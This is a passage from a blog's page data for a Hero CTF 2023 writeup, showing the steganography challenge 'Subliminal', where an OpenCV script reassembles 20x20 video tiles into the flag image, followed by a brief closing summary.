url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFgElEQVQ4yx2V6VPT+R3H80Q7HhzrDhAjEgngwRXOAAmBhEACSTgSchGOkHBGNiERshKMXAoRJYBIRauDu+oedrV2d+zuWmV3Z1d37GxndzpOXdtOp51tO9On/Qte/bUPvk++Dz7f9/n5ir7/7hXBQTejPRZsBhV1pUd4/OQZz1685PY7d4hPB1k9N8Oty0usz4UJuNs47TRx2W0m2ChnytbAhKUBp/wwzfJsRK9f/cSp4S4mR/vo0CrQlEjZefo1P7z8Ozuf73D7yhyXF2e4ev40KzMh1t8O8PHqJRL9Vly1uZz22rkQCWCvlGEty0G0vXWVnnYNsfAQuvLj2PRq/vmv//D6r//mqy+ecWVxik8f7XAlfo7oSDfrsVM8is/yOBog0almzaJh06plSVvERNVRYeC1Lax6Bb3GCkqkKegVJ/js0RN++OM/eHDvAQ8XB3j59BO21hLEpwIsCGwuveXjw7OTXHfUsxEaZFO4WxAGhityEd17/yNcJhVj3W0UHkrB0aTk+cMPeb3zMb//1Q3+dtPOj7fGuLEUZWU2wtqEn9XRHoJtdfiay9lOXODmykV8jeW0FmYi+urL73AYqhhy6DmR+QZ+Ywk/3Y/xl7uz/OnnHl4tm/h8NcwHyxHW56dYO3eWzfNzLNibCJoV3ItN8HByjEBzFTXHMhA9/u1zmqtz8Vh0HMlIZtKq5M+JXn53cZjvL3n4camVFxtB3rsQYXMxxvXlBeLhYeZsjZzUl3Kmr51ZeyNebTG9cimi89EQ6oI3cehKyErbz7Krhj/EfXw738OTKQt3T1n4ZmOczzamub+5yrWFM7zrMXPWWs9Ak5yop1VweYwRs5qao+mI/G4TWrmYPksjWeJUVuzlfDnt5E64m19HXDyJObi/tsjTtdN8Gx/lk8lBVrxW4v0W/IYSot4Obk2H8XZoKJcdQLR2cRmDIpuw10GOOImZzloeRJxsBrq4M+HkNxOtfDPfz9N5H89nnLyY62fb38ntoIfJllIuTgdYFkyyV+ehyk1DdHV9A5NCxrixiqwDuwlb67g27mI74uYXIRdbgzo+jfXx/vQAt6ID3Am5SXQbuTzsZKyxmJW3+pjx2OiqL6RY+gaic7Pz1Oen4dWVCpSTCFg1fHDWx8M5NzfHzVwfreeXk+3c8BtZH7OzuTTPtM9GqLedDmUOXZoi2tWFtNbmU3Q4FVF8vIdKWSp2nQJp2l66TXUsDxh5169nzaci4VGxHWrn+kgrdyf6uCFoOOfU4W2pRlsiQXn8AFW5qTQUSyjITEY01W1ALkC11haTI0nGqpZzptfMkrdVyFoViR41t0+a2PIZuCog/GguxJJLj0NAVFuQRql0P4UH91CWnUxRloAw4tKiL8+kX19ArVxCc1U+AaeRJV87k0LIzzuUwlETNFUStWnZOjXMpN2AsToHdXG6QHMfxzP2ID+cxDFBMtGQqYyoWcqMNQdlgQRn9TGGBD1jjiY8WjndqjyGTdWMtKmY6Gkj4Xcx8H+6hymQ7CErZTd5b/6MgoN7yUnbh6g+X0K78JKt4hBFR9KwKPIYMioZ724RDKqktyGbWH8dU4MaQv1qIh4Do0aFULN05JkppO/ZxaGUXVRK9lMmEXKoO55OlTQZf00WKkEDR00e451lBOylnDQLlawTC53NZMKWRdSdzXRvKUMtJ+iqOEKtLJ3M5H0k7d6FUpxCvVSMKGjTMNyhY0yoUsTVyNt9jYTcNcKp5qRFyWCnge6GQtrKkrCpMhjRC7JoD2EWXDUfFSNL2Uth6j4sRRkY/rccKk9IKcvPo/KoFL2qEEdLsbATZXSoj9EkfAdNZbm0CFtcU5BBjVDRxlIxhgqxEBfBYVkGcpmY4qwMVDlianIP8l8ZHjttKnGktQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f6cbe5847fad49abb24c9f31bf03967a/8ac56/image-20230517233841644.webp 240w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/d3be9/image-20230517233841644.webp 480w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/6b97b/image-20230517233841644.webp 506w\"\n              sizes=\"(max-width: 506px) 100vw, 506px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f6cbe5847fad49abb24c9f31bf03967a/8ff5a/image-20230517233841644.png 240w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/e85cb/image-20230517233841644.png 480w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png 506w\"\n            sizes=\"(max-width: 506px) 100vw, 506px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png\"\n            alt=\"image-20230517233841644\"\n            title=\"image-20230517233841644\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"subliminalstego\" style=\"position:relative;\"><a href=\"#subliminalstego\" aria-label=\"subliminalstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Subliminal(Stego)</h2>\n<blockquote>\n<p>An image has been hidden in this video. Don’t fall into madness.</p>\n<p>Little squares size : 20x20 pixels</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>When I played the provided mp4 file, I noticed that a 20*20-pixel image was moving one square at a time on each frame, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0klEQVQozz2PW1NbVRSAz6Mzzmg7OrZQA01IIDlJSENpLueccHIjISRcQ4gltLVWLgZoIFhDbJ0KIUQLgoG204rWVh2f1Af9gZ+L2vHhm7XWXnt/a23FXHxI7LMm+XqbjfbvNF/9TevXf/j85Dema99Lb494uYm51CS6/B+x8h6JtW9JVvZJbR6S+aJNduuYbP0xSnxFmpUDhsot9KVdtP9pytkhtad1mi8qFO4fEF09FMkRqWpbJI/J1J+Q/eoZYw9Pmdx5ydTuLygxESXu7guPRLxPcv2AdPVI6hM+etCi9cMttk+KLO1UZONDxs9EtROyD54wfibafkG+ccpM8zmzrecoiZUWw+tHMrlNrnrM9doxQ/M1Zjdq7Dy7yXI9z8K9KTYaJcpfrzFXuc/81ncUG69E9iOFxjazuysU9u5Q3LstX16eIbEyR7qywHxtm9trX5K7cYuPN5P89NcIP/85yss/cjx6GmGrNcZa/R4L1V0WvzllulEX2U2KzTkRlkRYQrlWCBIshoQgiRs5UqUJonMGk5/4WLzrYXXTLaiUhU/XVe5UUhQWS+RWrzOyPsHIxgSZqsTNMUar4yhOU8UVe0NUxRP14E/2E0h76PVZ0GJOzKybQcNG0OghPd2PmR/EmAkJYfRCGG02TFiWCglKaFglkvGipd1oIx4MyY3RfnQZYLd2osVVYlNXcHi78frtJCf8DGU9b3AL8j7rQh91okmumKN+ckWTzIzB8HSYZD7MZCpA4Py7WN96G2vHe1wbsBK/+AG+c+/g8XyIeqUL1df1Orr9Z4Mu45bcO9CNMhi2oet2NN2BYfQSiTiJBVwM9HXT4+jEoVoIqHLHconu8+fo7Hgfi+0CVucl7C4Ldulf7uugy3ERi/0CihZzYybky7rIjL7XBCO9hE0nVw07AcOBX+/BG7LRH7ThC1kZkPoMv27jquDRugjEnYRMF/8CXRCr7SPE77YAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9d7f85cc58e0827afc205841a89aa532/8ac56/image-20230517233038973.webp 240w,\n/static/9d7f85cc58e0827afc205841a89aa532/d3be9/image-20230517233038973.webp 480w,\n/static/9d7f85cc58e0827afc205841a89aa532/39392/image-20230517233038973.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d7f85cc58e0827afc205841a89aa532/8ff5a/image-20230517233038973.png 240w,\n/static/9d7f85cc58e0827afc205841a89aa532/e85cb/image-20230517233038973.png 480w,\n/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png\"\n            alt=\"image-20230517233038973\"\n            title=\"image-20230517233038973\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It looked like I could recover the flag by stitching these 20*20-pixel images together into a single image.</p>\n<p>So I decided to use OpenCV in the following solver to extract the image at the specified pixels from each frame and finally merge them into one image.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># pip install opencv-python</span>\n<span class=\"token keyword\">import</span> cv2\n\n<span class=\"token comment\"># Open the video file</span>\ncap <span class=\"token operator\">=</span> cv2<span class=\"token punctuation\">.</span>VideoCapture<span class=\"token punctuation\">(</span><span class=\"token string\">'subliminal_hide.mp4'</span><span class=\"token punctuation\">)</span>\nwidth <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>cap<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>cv2<span class=\"token punctuation\">.</span>CAP_PROP_FRAME_WIDTH<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nheight <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>cap<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>cv2<span class=\"token punctuation\">.</span>CAP_PROP_FRAME_HEIGHT<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>width<span class=\"token punctuation\">,</span>height<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Size of the image tiles to concatenate</span>\nsize <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token number\">20</span><span class=\"token punctuation\">,</span> <span class=\"token number\">20</span><span class=\"token punctuation\">)</span>\nimages <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n\nx <span class=\"token operator\">=</span> <span class=\"token number\">0</span>  <span class=\"token comment\"># Initial x-coordinate</span>\ny <span class=\"token operator\">=</span> <span class=\"token number\">0</span>  <span class=\"token comment\"># Initial y-coordinate</span>\ncrop_x <span class=\"token operator\">=</span> <span class=\"token number\">20</span>  <span class=\"token comment\"># Crop width along the x-axis</span>\ncrop_y <span class=\"token operator\">=</span> <span class=\"token number\">20</span>  <span class=\"token comment\"># Crop width along the y-axis</span>\n\n<span class=\"token comment\"># Extract images</span>\nframe_count <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\ni <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n<span class=\"token keyword\">while</span> cap<span class=\"token punctuation\">.</span>isOpened<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    ret<span class=\"token punctuation\">,</span> frame <span class=\"token operator\">=</span> cap<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> ret<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">break</span>\n    frame_count <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n\n    <span class=\"token comment\"># Process one frame at a time</span>\n    crop_img <span class=\"token operator\">=</span> frame<span class=\"token punctuation\">[</span>y<span class=\"token punctuation\">:</span>y<span class=\"token operator\">+</span>crop_y<span class=\"token punctuation\">,</span> x<span class=\"token punctuation\">:</span>x<span class=\"token operator\">+</span>crop_x<span class=\"token punctuation\">]</span>\n    images<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span>crop_img<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> x<span class=\"token operator\">+</span>crop_x <span class=\"token operator\">==</span> width<span class=\"token punctuation\">:</span>\n        <span class=\"token comment\"># Combine the images</span>\n        result <span class=\"token operator\">=</span> cv2<span class=\"token punctuation\">.</span>hconcat<span class=\"token punctuation\">(</span>images<span class=\"token punctuation\">)</span>\n        cv2<span class=\"token punctuation\">.</span>imwrite<span class=\"token punctuation\">(</span><span class=\"token string\">'./images/result{}.jpg'</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> result<span class=\"token punctuation\">)</span>\n        images <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n\n        x <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n        i <span class=\"token operator\">+=</span> <span class=\"token number\">1</span>\n        <span class=\"token keyword\">if</span> y<span class=\"token operator\">+</span>crop_y <span class=\"token operator\">==</span> height<span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">break</span>\n        <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n            y <span class=\"token operator\">+=</span> crop_y\n            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span>y<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n        x <span class=\"token operator\">+=</span> crop_x\n\n<span class=\"token comment\"># Release the video file</span>\ncap<span class=\"token punctuation\">.</span>release<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nimages <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">36</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    images<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span>cv2<span class=\"token punctuation\">.</span>imread<span class=\"token punctuation\">(</span><span class=\"token string\">'./images/result{}.jpg'</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nresult <span class=\"token operator\">=</span> cv2<span class=\"token punctuation\">.</span>vconcat<span class=\"token punctuation\">(</span>images<span class=\"token punctuation\">)</span>\ncv2<span class=\"token punctuation\">.</span>imwrite<span class=\"token punctuation\">(</span><span class=\"token string\">'result.jpg'</span><span class=\"token punctuation\">,</span> result<span class=\"token punctuation\">)</span></code></pre></div>\n<p>This let me extract the flag from the resulting image.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/709f687e0fb871214acb3f4cdbce7b2f/7a18f/image-20230517233320477.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1ElEQVQoz4VSbVPTQBDO//8LzPhZlGqryOCMOn7AaRtSIqlAq7aFQkWGtgmQl3tJ8ri7SQ34xbt55m73nn1ub/ecVbSGLgwyo6AImdVQVtXQZKvq7JFP/Gazf+p3wvsQFrmImtLC0KpzTTCCnHw8TWHF5tWWOQqUf21T5PVq4aw3giSSmkxEeZQ0ecTqAVEckd+ICF+Y6gz8MmbkNA3FmqKCs74LwffxbR8/f0L7TQc9ty97d+DCHx5he+c5Ortt8fW9Q8RZgrd77/Cl18XN8oaiOXtKplCc4YoErdRhejFFcDLE0bGP0Y8R4Qxn308xnozh+YfwA/L/HCO8j0S477lYhrecI1SRUdlqQdIXg0dwEmB2OcP17QLB6TEGvofF7yvMLiY4J//81xze14FcOF+cU0QBlSuJN40gN0Ah0TE90cfO65d4/2EfL1rbeNVpoet20Wq3xNfzuth6toWD3oFkXUj9K7Gqho8Er64v5QmpTpFQnTKTCjGXthGr1IJExdTABNFDKH75FRvB1d1SNspyDZpuWe4cP4WKrWwKTTXWzKl5DEudlzjiKeYRHP4WqD9KM8p/8L/z5sz5NhpKsWfU4Q2m8wl1fNLYNRpOdV5xnnL/ABnCPaTv38gmAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/709f687e0fb871214acb3f4cdbce7b2f/8ac56/image-20230517233320477.webp 240w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/d3be9/image-20230517233320477.webp 480w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/e46b2/image-20230517233320477.webp 960w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/26255/image-20230517233320477.webp 1284w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/709f687e0fb871214acb3f4cdbce7b2f/8ff5a/image-20230517233320477.png 240w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/e85cb/image-20230517233320477.png 480w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/d9199/image-20230517233320477.png 960w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/7a18f/image-20230517233320477.png 1284w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/709f687e0fb871214acb3f4cdbce7b2f/d9199/image-20230517233320477.png\"\n            alt=\"image-20230517233320477\"\n            title=\"image-20230517233320477\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>This time again I mainly worked on Rev and Forensic, and I really enjoyed how distinctive the problems were, using real malware and incidents almost as-is.</p>\n<p>There are still a few challenges I haven’t solved yet, so I want to retry them while reading the writeups.</p>","fields":{"slug":"/ctf-heroctf-2023-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/forensic-en/","/tag/osint-en/","/tag/english/"]},"frontmatter":{"date":"2023-05-16","description":"Hero CTF 2023 Writeup","tags":["CTF (en)","Rev (en)","Forensic (en)","OSINT (en)","English"],"title":"Hero CTF 2023 Writeup","socialImage":{"publicURL":"/static/354a25e616ee5512c3e7d6805372d84b/ctf-heroctf-2023.png"}}}},"pageContext":{"slug":"/ctf-heroctf-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}